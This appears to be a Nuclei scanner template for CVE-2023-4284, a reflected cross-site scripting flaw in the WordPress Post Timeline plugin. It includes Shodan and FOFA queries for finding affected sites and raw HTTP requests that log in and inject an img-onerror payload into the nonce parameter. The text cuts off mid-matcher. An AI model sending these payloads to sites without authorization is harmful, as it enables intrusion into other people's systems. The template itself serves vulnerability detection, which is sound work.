id: CVE-2023-4284 info: name: WordPress Post Timeline Plugin < 2.2.6 - Cross-Site Scripting author: ritikchaddha severity: high description: | The Post Timeline WordPress plugin before version 2.2.6 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape an invalid nonce before outputting it back in an AJAX response, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context. impact: | Authenticated attackers can inject malicious JavaScript through an invalid nonce parameter in AJAX responses to execute code in administrator browsers and potentially hijack WordPress sites. remediation: | Update Post Timeline plugin to version 2.2.6 or later that properly sanitizes and escapes the nonce parameter in AJAX responses. reference: - https://wpscan.com/vulnerability/1c126869-0afa-456f-94cc-10334964e5f9 - https://nvd.nist.gov/vuln/detail/CVE-2023-4284 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N cvss-score: 7.1 cve-id: CVE-2023-4284 cwe-id: CWE-79 epss-score: 0.00709 epss-percentile: 0.48856 cpe: cpe:2.3:a:agilelogix:post_timeline:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: agilelogix product: post-timeline shodan-query: http.html:"wp-content/plugins/post-timeline/" fofa-query: body="wp-content/plugins/post-timeline/" tags: cve,cve2023,wordpress,wp,wp-plugin,xss,post-timeline,authenticated,vuln flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} redirects: true matchers: - type: word part: body words: - 'post-timeline' internal: true - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin-ajax.php?action=ptl_ajax_handler&asl-nounce=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '